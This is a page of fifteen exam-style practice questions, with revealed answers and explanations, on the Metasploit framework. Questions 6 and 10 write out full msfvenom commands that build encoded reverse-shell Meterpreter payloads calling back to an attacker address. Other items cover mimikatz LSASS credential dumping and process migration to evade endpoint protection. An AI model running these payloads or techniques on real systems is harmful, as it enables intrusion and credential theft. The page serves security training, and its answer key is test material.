Courseiva

CCNA Metasploit Questions

15 questions · Metasploit topic · All types, answers revealed

1
MCQhard

Refer to the exhibit. What is the most likely cause of the 'Connection reset by peer' error when using the PsExec module?

A.The SMB credentials provided are incorrect
B.The listener port is blocked by the target firewall
C.Endpoint security or a firewall terminated the SMB connection
D.The payload architecture does not match the target
AnswerC

This specific error code in the context of PsExec often signals that a security product or the Windows firewall identified the suspicious activity of installing a service remotely and terminated the SMB connection to prevent further compromise, which is standard behavior for modern EDR solutions in a secure environment.

Why this answer

The error 'Connection reset by peer' during a PsExec exploit attempt usually indicates that an active security control, such as a host-based firewall or endpoint protection, terminated the connection. PsExec relies on the Admin$ share and the service control manager. If the target system detects the service installation attempt or the connection from an unauthorized source, it will forcefully drop the connection to block the exploitation attempt, a common scenario in hardened enterprise environments.

Exam trap

Candidates often assume the error is due to a syntax error in the Metasploit module or an invalid payload, ignoring the reality of host-based security blocking SMB administrative shares.

2
MCQhard

During an internal assessment, a tester uses the auxiliary scanner auxiliary/scanner/smb/smb_version and receives the result 'Host is running Windows Server 2016'. The tester then selects exploit/windows/smb/ms17_010_eternalblue but the exploit reports 'The target is not vulnerable'. Which Metasploit feature should the tester use to determine why the exploit check failed and what SMB dialect the target actually supports?

A.Run the exploit module's check method and then inspect the module's verbose output for the SMB dialect and error details
B.Switch to auxiliary/scanner/smb/smb_ms17_010 and review its output
C.Use the smb_version scanner with the SMB2 option disabled to force SMB1 negotiation
D.Run the exploit with the ForceExploit advanced option set to true
AnswerA

Metasploit exploit modules implement a check method that returns a vulnerability status and often prints detailed diagnostic messages when Verbose is enabled. Running check and reviewing the verbose output reveals the SMB dialect negotiated and the specific reason the check failed, such as a missing patch or unsupported dialect. This directly answers both what dialect is in use and why the exploit check failed.

Why this answer

Exploit modules include a check method that returns a status and, with Verbose enabled, prints the negotiated SMB dialect and the reason the target failed the vulnerability test. Running check and reading that output directly explains the mismatch between the scanner result and the exploit check. Forcing the exploit or running another scanner does not surface the underlying diagnostic detail.

Exam trap

The trap here is believing a version scanner's output is sufficient to predict exploit success, when the exploit's own check method provides the dialect and failure reasons needed for diagnosis.

3
MCQmedium

Which of the following describes the function of the 'msfvenom' tool within the Metasploit ecosystem?

A.To act as a central vulnerability database
B.To automate the exploitation of remote services
C.To generate and encode custom payloads
D.To manage active sessions and post-exploitation
AnswerC

Msfvenom allows for the creation of various payload types while applying encoding techniques to modify the binary signature. This is a crucial task for penetration testers who need to evade simple signature-based security controls by creating unique, obfuscated payloads that are less likely to be detected by traditional antivirus software.

Why this answer

Msfvenom combines the functionality of the old 'msfpayload' and 'msfencode' tools. It is used to generate standalone, malicious payloads for a variety of platforms. Understanding how to generate custom shellcode is essential for penetration testers who need to tailor their delivery mechanism to bypass specific security controls, such as application whitelisting or signature-based antivirus, which often block default, well-known Metasploit payload binaries.

Exam trap

Candidates often confuse msfvenom with the Metasploit exploit modules themselves. They mistakenly believe it is used for scanning or post-exploitation, rather than solely for payload generation and encoding.

4
MCQeasy

What is the purpose of the 'meterpreter' payload in the Metasploit framework?

A.To perform network scanning
B.To provide an extensible, memory-only command interface
C.To encode payloads for bypass
D.To generate shellcode for hardware
AnswerB

Meterpreter is designed to run in memory, minimizing its footprint on the target system. It offers a wide range of extensible commands that allow the penetration tester to interact with the system, escalate privileges, and maintain access, all while remaining highly resilient against traditional file-based signature detection methods.

Why this answer

Meterpreter is a sophisticated, memory-resident payload that provides an advanced interactive shell. It operates entirely in memory, which helps it evade disk-based antivirus detection. Its importance lies in its extensibility; it allows testers to load modules dynamically, perform file system operations, dump memory, and migrate processes without writing files to the disk, making it a critical component for stealthy and efficient post-exploitation operations in modern security assessments.

Exam trap

Candidates often confuse Meterpreter with a standard reverse shell or a persistence mechanism, failing to realize its core advantage is its memory-only, extensible architecture that avoids writing to the disk.

5
MCQhard

When a reverse shell connection fails to reach the listener, what is the best first step for troubleshooting?

A.Re-run the exploit with a different payload
B.Check local listener status and connectivity
C.Upgrade the Metasploit framework
D.Restart the target machine
AnswerB

The first step in troubleshooting is to ensure the listener is actually running and reachable. Checking if the LHOST is correct and if there is a firewall blocking the LPORT on the attacker's side is crucial, as this is the most common cause of failed reverse connections in laboratory environments.

Why this answer

Network connectivity issues are the most common reason for failed exploitation. Verifying the listener configuration and ensuring the target can actually reach the attacker's IP is the logical starting point. Using tools like 'netcat' to test the connectivity or verifying the LHOST settings ensures that the issue is not a simple misconfiguration, which saves significant time during a penetration test by eliminating basic networking errors before checking for complex security controls.

Exam trap

Candidates often jump to complex conclusions like firewall rules or payload encoding issues before verifying the most basic requirement: is the listener actually running and reachable?

6
MCQhard

A penetration tester uses msfvenom to generate a Linux ELF reverse shell payload. The tester wants the payload to connect back to 192.168.1.50 on port 4444 and to embed an encoder that removes null bytes and other bad characters to survive transmission through a constrained channel. Which msfvenom command line correctly produces this payload?

A.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf
B.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -f elf -o shell.elf
C.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf --platform windows
D.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f exe -o shell.elf
AnswerA

This command selects the Linux reverse TCP payload, sets the callback host and port, applies the shikata_ga_nai encoder, specifies null bytes as bad characters to avoid, and outputs an ELF file. The -b option tells msfvenom to encode the payload so the listed bytes do not appear, which is exactly the requirement for surviving a constrained channel. All parameters align with the scenario.

Why this answer

The correct msfvenom invocation selects the Linux reverse TCP payload, supplies the callback host and port, applies the shikata_ga_nai encoder, declares null bytes as bad characters with -b, and outputs an ELF file. The -b option is what drives the encoder to avoid those bytes in the final payload, which is required for the constrained channel. The other options either omit bad-character handling, use the wrong format, or add a contradictory platform flag.

Exam trap

The trap here is focusing on the encoder flag while overlooking that bad-character exclusion requires the -b option and that the output format must match the target platform.

7
MCQmedium

Refer to the exhibit. Why did the EternalBlue exploit attempt fail despite the scanner identifying the target as vulnerable?

A.The RHOSTS value is configured incorrectly
B.The exploit module requires an active session
C.The target environment rejected the payload execution
D.The listener port is already in use by another process
AnswerC

Even if the target is vulnerable, the exploit might fail due to environmental factors like antivirus, system stability, or specific patch levels not caught by the scanner. This is a common real-world failure mode where the vulnerability check passes, but the actual payload delivery or execution is blocked by security controls.

Why this answer

The exhibit shows the module successfully detected vulnerability but failed exploitation. This often occurs due to differences in the target's operating system build, unexpected memory protection, or a race condition where the service crashed during the initial check. In professional testing, this highlights the instability of kernel-level exploits.

Even if a target appears vulnerable, environmental variables like patches, antivirus interference, or DEP/ASLR settings can prevent the shellcode from executing correctly in memory.

Exam trap

Candidates often assume that a positive vulnerability scan guarantees successful exploitation, forgetting that runtime environmental factors like patches, AV, or memory protections can crash payloads.

8
MCQeasy

In Metasploit, what is the significance of the 'LHOST' parameter when setting up a reverse shell?

A.It defines the target's listening port
B.It identifies the attacker's IP address for the callback
C.It is used to scan the local network
D.It defines the exploit's remote host target
AnswerB

LHOST is the essential configuration setting that dictates where the victim machine should send the reverse connection. If this is incorrect, the target will attempt to connect to the wrong address, and the listener will never receive the connection, resulting in a failed exploitation attempt during the test.

Why this answer

The LHOST parameter is the IP address of the attacker's machine. It tells the target machine where to send its callback once the payload is executed. Misconfiguring this is a common point of failure for beginners.

Ensuring the correct LHOST is set is critical for establishing a stable connection between the target and the penetration tester's workstation during the exploitation phase of the engagement.

Exam trap

Many students mistakenly identify LHOST as the target machine's IP address, failing to understand that LHOST is the attacker's IP where the listener is waiting for the callback.

9
MCQmedium

When using Metasploit to perform a vulnerability scan, which module type should be selected?

A.Exploit modules
B.Auxiliary modules
C.Post-exploitation modules
D.Payload modules
AnswerB

Auxiliary modules are the correct choice for non-intrusive tasks like port scanning, service enumeration, and vulnerability identification. They provide a safe and effective way to gather information about the target environment without the risk of triggering an unintended exploitation attempt, which is essential for professional and methodical penetration testing engagements.

Why this answer

Metasploit includes auxiliary modules specifically designed for scanning, reconnaissance, and enumeration. These modules do not necessarily exploit a vulnerability but rather test for their presence or collect information about the target environment. Being proficient with these is crucial for the early reconnaissance phase of a penetration test, allowing the tester to map the target network and identify potential entry points before attempting to launch more invasive exploit modules.

Exam trap

Candidates often confuse Metasploit exploit modules with auxiliary modules, incorrectly thinking that exploitation is always required to scan networks or enumerate services during the initial reconnaissance phase.

10
MCQeasy

A penetration tester needs to generate a standalone Windows executable payload that will connect back to the tester's machine at 10.10.14.5 on port 4444. The tester wants to avoid depending on the Metasploit console during payload generation. Which msfvenom command should be used?

A.msfvenom -p windows/meterpreter/reverse_tcp LHOST=4444 LPORT=10.10.14.5 -f exe -o payload.exe
B.msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
C.msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
D.msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
AnswerD

This command uses msfvenom to generate a Windows Meterpreter reverse TCP payload with the correct callback address and port, and writes it as an executable named payload.exe. It matches all stated requirements: standalone generation outside the console, Windows target, and reverse connection to 10.10.14.5:4444.

Why this answer

The correct msfvenom syntax requires -p to specify the payload, LHOST for the callback IP address, LPORT for the callback port, -f for the output format, and -o for the output file. The windows/meterpreter/reverse_tcp payload with LHOST=10.10.14.5 and LPORT=4444 produces the desired executable. Swapping LHOST and LPORT or choosing a bind or plain shell payload fails to meet the scenario.

Exam trap

The trap here is mixing up LHOST and LPORT values, or selecting a bind payload when a reverse connection is required.

11
MCQmedium

Refer to the exhibit. Which command allows the tester to switch their interaction focus from session 1 to session 2?

A.sessions -s 2
B.sessions -i 2
C.switch 2
D.use session 2
AnswerB

The '-i' flag stands for interact, and specifying the session ID (2 in this case) correctly switches the console focus to that session. This is the standard procedure in Metasploit for moving between different active shells when managing multiple compromises during a large-scale penetration test engagement.

Why this answer

Managing multiple sessions is a common task in professional penetration tests where an attacker may have compromised several machines. The 'sessions -i' command is the standard way to switch the console interface to a different active session. Being able to quickly toggle between sessions is essential for maintaining control over multiple compromised systems simultaneously without needing to manually reconnect to each one.

Exam trap

Candidates often guess command syntax like 'switch 2' or 'interact 2' instead of the standard Metasploit 'sessions -i' syntax, failing to recall the specific flags used for session management.

12
MCQmedium

Which command in the Metasploit Framework allows a user to interact with a backgrounded session after a successful exploit execution?

A.exploit -j
B.sessions -i
C.run -s
D.use -session
AnswerB

The sessions command with the -i flag followed by the ID number is the standard syntax for interacting with a specific established Meterpreter session. It transfers the console's input/output to the remote system, allowing the tester to execute commands directly on the target machine with the payload's privileges.

Why this answer

The 'sessions' command is the primary method for managing active connections within Metasploit. Once an exploit establishes a payload, the session moves to the background. Using 'sessions -i <id>' connects the user to the specific meterpreter shell, enabling post-exploitation activities.

This is crucial for maintaining persistence and executing lateral movement tasks in a penetration test, as it allows the operator to toggle between multiple compromised targets effectively.

Exam trap

Candidates often confuse the 'sessions -i' command with 'exploit' or 'connect', mistakenly believing that they need to re-run the exploit to regain access to a backgrounded session.

13
MCQmedium

A tester has compromised a Windows host and wants to use Metasploit to harvest credentials from memory without uploading additional tools. Which Metasploit post-exploitation module should be used to extract password hashes from the LSASS process?

A.post/windows/gather/smart_hashdump
B.post/windows/gather/credentials/mimikatz
C.post/windows/gather/hashdump
D.post/windows/gather/credentials/credential_collector
AnswerB

The mimikatz module in Metasploit uses the Mimikatz tool to extract credentials from LSASS memory, including plaintext passwords, hashes, and Kerberos tickets. It runs in memory without uploading additional tools, directly satisfying the requirement to harvest credentials from memory on the compromised Windows host.

Why this answer

To extract credentials from LSASS memory, the Mimikatz-based post module is the appropriate choice. It interacts with LSASS to retrieve plaintext passwords, NTLM hashes, and Kerberos tickets. Other modules like hashdump and smart_hashdump target the SAM database or NTDS.dit, and credential_collector gathers from registry and files, so they do not meet the specific requirement of memory credential harvesting.

Exam trap

The trap here is assuming hashdump or smart_hashdump extracts credentials from LSASS memory, when they primarily target the SAM database.

14
MCQhard

During a penetration test, a tester obtains a Meterpreter session on a Windows host but the session dies immediately after the initial connection. The tester suspects that the payload is being terminated by endpoint protection. Which Meterpreter feature should the tester use to migrate the session into a more stable process?

A.load
B.sessions -k
C.background
D.migrate
AnswerD

The migrate command in Meterpreter moves the session into another running process on the target. By migrating into a stable, long-running process such as explorer.exe, the tester can avoid having the payload terminated when the original process exits or is flagged by endpoint protection. This directly addresses the unstable session issue.

Why this answer

When a Meterpreter session is unstable because the hosting process is being terminated, migrating to a stable process is the appropriate step. The migrate command injects the Meterpreter payload into another process, ideally a long-running one like explorer.exe. Backgrounding, loading extensions, or killing the session do not address the root cause of instability.

Exam trap

The trap here is confusing backgrounding a session with migrating it; backgrounding only returns to the console and does not change the hosting process.

15
MCQeasy

A penetration tester has just obtained a Meterpreter session on a Linux web server and wants to keep it active while performing other tasks in msfconsole. Which command should the tester issue to return to the msfconsole prompt while leaving the session running in the background?

A.background
B.exit
C.suspend
D.detach
AnswerA

The background command, also available as bg, returns the tester to the msfconsole prompt while keeping the Meterpreter session alive and tracked by the framework. The session remains listed and can be resumed later with the sessions -i command. This is the standard way to multitask across multiple sessions without losing access.

Why this answer

The background command returns control to the msfconsole prompt while preserving the Meterpreter session in the framework's session list. The session continues to run and can be resumed later using sessions -i with the session identifier. Commands like exit or non-existent detach and suspend would either terminate the session or fail, so background is the correct choice.

Exam trap

The trap here is assuming exit or a detach-style command preserves the session, when only background returns to the console without terminating the connection.

Ready to test yourself?

Try a timed practice session using only Metasploit questions.